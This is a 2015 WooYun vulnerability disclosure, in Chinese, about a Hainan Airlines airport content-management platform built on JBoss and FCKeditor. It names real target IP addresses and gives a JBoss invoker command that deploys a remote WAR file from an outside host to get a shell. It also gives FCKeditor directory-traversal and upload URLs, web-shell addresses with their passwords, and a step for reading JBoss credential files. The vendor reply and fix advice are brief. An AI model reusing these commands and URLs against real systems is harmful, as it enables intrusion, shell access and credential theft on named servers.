当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117493

漏洞标题:海南航空某定制管理平台通用型漏洞打包(getshell)

相关厂商:海南航空

漏洞作者: 茜茜公主

提交时间:2015-06-01 15:06

修复时间:2015-08-31 09:16

公开时间:2015-08-31 09:16

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向第三方安全合作伙伴开放
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

1#配置不当导致命令执行(个别站),
主要是下面这2个
2#目录遍历,
3#任意文件上传。

详细说明:

这套CMS都长这个样

QQ截图20150601103819.jpg


在页面顶部明显位置均有标注海航机场网站内容管理平台

QQ截图20150601103920.jpg


关键字:“autoweb 机场”
这套CMS由2个部分组成,一部分是autoweb前台,一部分是autoportal后台,所以搜的时候搜前台合适

QQ截图20150601104041.jpg


前台长这样

QQ截图20150601105849.jpg


这些案例均属于海南航空集团旗下
把我找到的一些案例列出来

http://111.207.210.120/autoportal/LoginForm.jsp
http://202.100.200.203/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用)
http://202.100.200.73/autoportal/LoginForm.jsp
http://113.59.108.89/autoportal/LoginForm.jsp
http://221.11.139.164/autoportal/LoginForm.jsp(提示无权限访问,但没关系,漏洞仍然可以利用)
等等


以http://111.207.210.120/autoportal/LoginForm.jsp该站为例

QQ截图20150531133620.jpg


该系统中间件jboss存在漏洞(貌似只有这个站有invoker/JMXInvokerServlet),其它站都是jmx-console,但无法绕过认证上传shell
http://111.207.210.120/invoker/JMXInvokerServlet,可通过下面代码进行getshell

java -jar jboss_exploit_fat.jar -i http://111.207.210.120/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://p2j.cn/is.war


QQ截图20150531134416.jpg


一句话地址:http://111.207.210.120/is/index.jsp
密码:023

QQ截图20150531134539.jpg


QQ截图20150531170029.jpg


该服务器3389已开,已被黑客拿下用作挖坑,挂qq

QQ截图20150601111414.jpg


漏洞证明:

接下来是漏洞2:fck目录遍历以及fck上传

http://111.207.210.120/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../../autoportal.ear/autoweb.war/autoweb/


QQ截图20150601111700.jpg


可跨目录

QQ截图20150531170502.jpg


服务器内容比较多,基本看不懂,很多的vm虚拟机

QQ截图20150601113107.jpg


fck拿shell

http://111.207.210.120/autoportal/nebula/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://111.207.210.120/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector


可直接上传jsp文件

QQ截图20150601113619.jpg


但访问jsp会跳转到系统登录页
后台的设计还是比较合理的,没有漏洞可钻,所以我把jsp一句话跨目录传到了前台autoweb,利用fck的目录遍历功能,找到autoweb的路径,上传之
POC见测试代码

QQ截图20150601115642.jpg


一句话http://111.207.210.120/autoweb/wooyun.jsp
密码:wooyun

QQ截图20150601115323.jpg


QQ截图20150601124749.jpg


其它几个案例的fck问题:

http://202.100.200.203//autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../


QQ截图20150601130801.jpg


这个站已成马场,上传的话直接用poc比较快

QQ截图20150601131211.jpg


http://202.100.200.203/qutoweb/wooyun.jsp

QQ截图20150601131258.jpg


下面几个案例的fck上传我就不演示了

http://202.100.200.73//autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../


QQ截图20150601131351.jpg


http://113.59.108.89//autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../


QQ截图20150601131446.jpg


http://221.11.139.164//autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../../


QQ截图20150601131509.jpg


因为该套系统用的都是jboss,所以我拿到shell后,可以去读jmx-console-users.properties获取jboss认证,之后仍可通过
http://113.59.108.89/jmx-console/
http://111.207.210.120/jmx-console/
http://202.100.200.203/jmx-console/
http://202.100.200.73/jmx-console/
http://221.11.139.164/jmx-console/
部署war,getshell

修复方案:

在修复编辑器漏洞的同时,记得修改认证密码,最好直接删除jmx-console

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-02 09:15

厂商回复:

谢谢,我们立即安排组织漏洞修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-31 10:06 | Bear baby ( 普通白帽子 | Rank:183 漏洞数:20 | 善攻者,不知其所守。善守者,不知其所攻。)

    66666666